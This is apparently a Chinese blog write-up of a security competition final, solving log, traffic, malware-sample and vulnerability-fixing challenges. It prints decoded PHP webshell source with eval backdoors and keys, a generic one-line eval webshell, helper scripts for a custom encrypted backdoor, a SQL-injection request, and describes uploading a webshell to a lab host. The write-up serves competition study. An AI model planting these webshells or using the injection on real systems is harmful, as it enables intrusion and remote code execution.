关于 DreamCat

主题名称:DreamCat | 版本:3.0.240224

主题开发:HanFengA7 | CornWorld

Designed by HanFengA7 Power by Typecho

Copyright © 2015-2024 by LychApe All rights reserved!

menu
refresh

某竞赛决赛的WP

作者: ciaoℒy

时间:

日志数据分析1

使用工具打开分析日志文件

image-20231207090912546

flag{10.10.88.1012023-10-26_11:16:24}

日志数据分析2

搜索关键字: "/bin"

image-20231207091824074

得到flag1{nzud9lghka0v95bu}

搜索关键字: flag[^s]

image-20231207091925992

得到: flag2{s6owb741o2jcbixm}

拼接得到flag{nzud9lghka0v95bus6owb741o2jcbixm}

流量数据分析3

过滤POST请求: http.request.method == "POST"

发现有“=50=44=”字样的请求包, 追踪HTTP流, 得到如下内容:

image-20231207093022967

解码Hex再解码Base64得到木马源代码. 解码

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    //@call_user_func(new C(),$params)
    // 这里简单修改, 用kali运行起来
    echo $post;
?>

image-20231207093726874

在wireshark中寻找木马的响应包, 解密可得到flag

image-20231207093647527

flag{6ao6bnliyelpf2m5wudmt8ldudtnger8}

日志数据分析3

先过滤状态码为200的请求, 再过滤非static的请求, 最后提取http_body:

Get-Content .\access.log | Where-Object {$_ -like "*status`":200*"} | Where-Object {$_ -notlike "*/static/*" } | % {
  $json = ConvertFrom-Json $_;
  $json.http_body
}

image-20231207094702924

因为一般的一句话木马写法是: <?php eval($_POST["passwd"]);?>, 所以POST请求的参数名就是密码.

flag{5Zeo8A35Blcx6E0yq0Gk6iIu21TzQVLC}

恶意样本分析4

本来以为是个逆向呢, 一看图标是个python

image-20231207100710195

解包python, 获得源码:

python .\pyinstxtractor.py .\a.exe
.\pycdc.exe -o src.py .\a.exe_extracted\CTF.pyc
# Source Generated with Decompyle++
# File: CTF.pyc (Python 3.10)

def func1(state, key, length):
    for i in range(256):
        state[i] = i
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % length]) % 256
        state[i] = state[j]
        state[j] = state[i]

def func2(state, out, length):
    (i, j) = (0, 0)
    for idx in range(length):
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i] = state[j]
        state[j] = state[i]
        out[idx] ^= state[(state[i] + state[j]) % 256]

def func():
    state = (lambda .0: [ i for i in .0 ])(range(256))
    key = (lambda .0: [ ord(char) for char in .0 ])('flag')
    input_str = input('你的文件已经被加密,请输入正确的密钥来进行解密:')
    input_bytes = bytes(input_str, 'utf-8')
    if input_bytes[0] != 102 and input_bytes[1] != 108 and input_bytes[2] != 97 and input_bytes[3] != 103 and input_bytes[4] != 123 or input_bytes[20] != 125:
        return None
    in_data = None(input_bytes[5:20])
    func1(state, key, 4)
    func2(state, in_data, 15)
    enc_flag = [
        152,
        152,
        187,
        86,
        173,
        143,
        37,
        84,
        229,
        52,
        176,
        7,
        31,
        231,
        128]
    if in_data == bytearray(enc_flag):
        print('恭喜你解密成功!快去提交flag吧')
        return None
    None('对不起密钥不对哦')

if __name__ == '__main__':
    func()
    return None

是一个异或加密, 可逆.

修改一下代码, 使其重新加密一下enc_flag. 还有反编译的源码不对, 有一个地方似乎是要交换数组的两个值, 但是反编译出来的代码逻辑错了

# Source Generated with Decompyle++
# File: CTF.pyc (Python 3.10)

def func1(state, key, length):
    for i in range(256):
        state[i] = i
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % length]) % 256
        t = state[i]
        state[i] = state[j]
        state[j] = t

def func2(state, out, length):
    (i, j) = (0, 0)
    for idx in range(length):
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        t = state[i]
        state[i] = state[j]
        state[j] = t
        out[idx] ^= state[(state[i] + state[j]) % 256]

def func():
    state = list(range(256))
    key = b'flag'
    func1(state, key, 4)
    enc_flag = [
        152,
        152,
        187,
        86,
        173,
        143,
        37,
        84,
        229,
        52,
        176,
        7,
        31,
        231,
        128]
    func2(state, enc_flag, 15)
    print(enc_flag);

if __name__ == '__main__':
    func()

image-20231207101306284

flag{who_find_me_ohh}

流量数据分析2

过滤http请求, 可以得到一个server.key. 因为有很多TLS流量, 所以猜测可使用该key解密TLS:

image-20231207105233623

在http请求中发现了木马文件源码:

<?php
@error_reporting(0);
    function decrypt($data){
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
    $after=$bs($data."");
    for($i=0;$i<strlen($after);$i++)
    {
        $after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;}
    $post=Decrypt(file_get_contents("php://input"));
//这里简单修改, 用来解码
    echo $post;
?>

过滤http && tls, 查看解密后的tls流量. 逐个追踪流.

image-20231207105817467

Keep your eyes on my command.

发现了flag:

image-20231207105105183

image-20231207105320692

提交不对.......根据提示, 找到了一张图片

image-20231207110136370

继续查看流, 发现了另一个线索:

image-20231207105613117

053700357621

steghide, 解密可得flag

image-20231207111003389

flag{i_am_4_Sk111ed_H4ck32}

漏洞隐患修复1

开启环境, fscan扫描发现文件上传和ftp匿名登录:

image-20231207113143188

dirsearch扫描发现存在目录列出/uploads

image-20231207113336894

里面有一个ma.php. 上传一个一句话木马, 蚁剑连接.

修改/etc/vsftpd.conf, 把匿名登录关闭;

image-20231207113513193

修改/var/www/html/upload.php, 添加黑名单过滤上传

image-20231207113555095

重启一下ftp即可得到flag:

image-20231207113610408

flag{ldbx3G34TGxpVpcsxayX16dRVaZtMVOW}

漏洞隐患修复3

GET /OA_content.php?id=2%20or%201=2 HTTP/1.1
Host: 172.35.37.179
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UA=b2243a6f571176571e496260f845129c
Connection: close

有布尔型盲注, 但是不会写脚本......

团队

apt

根据题目提示, 过滤dns流量查找域名. 自定义列, 根据域名排序.

找到了如下包:

image-20231207140529890

flag{jimkim.xyz39.103.188.219}

木马后门排查

flag{kLJLAcvDXFHiLEhdCOOElkSIztCajNCh}

登录, 搜索eval/base64等关键字, 得到如下:

image-20231207150115656

是自定义协议的马. 在本机kali上编写两个文件用于加密和解密:

<?php
//@error_reporting(0);
$p8='c3284d0f94606de1fd2af172aba15bf3';
$a8='TkRRNE1UazJNamN5T0RFMk1USTRPWHBSS3prMWIzbFZiRk5rZG5SQ1EyOWpRMnh6U0djOVBRPT0=';
$d8='TkRRNE1UazJNamN5T0RFMk1USTRPVmRoWkdkdlRrWkdMMlpaV1hsdU9WRmtTVmhtY1ZwQk9WZGpOa2t5UnpOdk9EZFVORkpuV0hkbFJsTjZWVkIxZVhGRFRqTlRWVk51ZVVsRE5uaDZVamt4TkdWRFdXODROVmsyVW1FM01FdEJSVmtyWmxCMVVHRTRURzFGU2pGb0wzWTBMMk5sVkd0MWVuSkpQUT09';
$v8='4481962728161289';

function d($D, $K){
    $cipher='aes-128-cbc';
    $decodedData=base64_decode(base64_decode($D));
    $encryptedData=substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted=openssl_decrypt($encryptedData,$cipher,$K,0,$GLOBALS['v8']);
    return $decrypted;

}

$a8=trim(d($a8,$p8));
$d8=trim(d($d8,$p8));
echo $a8;
echo "d8:";
echo $d8;
echo "<br>";
echo "<br>";
echo "----------";
echo "<br>";
//echo $_POST['d'];
$post=d($_POST['d'], $p8);
    echo $post;
?>
<?php
//@error_reporting(0);
$p8='c3284d0f94606de1fd2af172aba15bf3';
$a8='TkRRNE1UazJNamN5T0RFMk1USTRPWHBSS3prMWIzbFZiRk5rZG5SQ1EyOWpRMnh6U0djOVBRPT0=';
$d8='TkRRNE1UazJNamN5T0RFMk1USTRPVmRoWkdkdlRrWkdMMlpaV1hsdU9WRmtTVmhtY1ZwQk9WZGpOa2t5UnpOdk9EZFVORkpuV0hkbFJsTjZWVkIxZVhGRFRqTlRWVk51ZVVsRE5uaDZVamt4TkdWRFdXODROVmsyVW1FM01FdEJSVmtyWmxCMVVHRTRURzFGU2pGb0wzWTBMMk5sVkd0MWVuSkpQUT09';
$v8='4481962728161289';
function e($D,$K){
    $cipher='aes-128-cbc';
    $encrypted=openssl_encrypt($D,$cipher,$K,0,$GLOBALS['v8']);
    $result=base64_encode($GLOBALS['v8'].$encrypted);
    $result=base64_encode($result);
    return $result;
}

$a8=trim(d($a8,$p8));
$d8=trim(d($d8,$p8));
echo $a8;
echo "d8:";
echo $d8;
echo "<br>";
echo "<br>";
echo "----------";
echo "<br>";
$post=e(file_get_contents("php://input"), $p8);
    echo $post;
?>

得到木马的相关信息如下:

a8: assert
d8: @eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")
# 根据注释提示, 得到id=md5('admin')

构造payload删除木马文件即可:

image-20231207150340992

image-20231207150353786

image-20231207150438785


#本文链接:https://blog.chaol.top/archives/86.html
#本文采用 CC BY-NC-SA 4.0 协议进行许可
#如无特别声明,该文章均为 ciaoℒy 原创,转载请遵循 署名-非商业性使用 4.0 国际(CC BY-NC 4.0)协议,即转载请注明文章来源。
#最后编辑时间为: 2024 年 01 月 12 日
WriteUp
none

create 添加新评论


account_circle
email
language
textsms



加我的QQ
加我的微博
加我的支付宝
加我的微信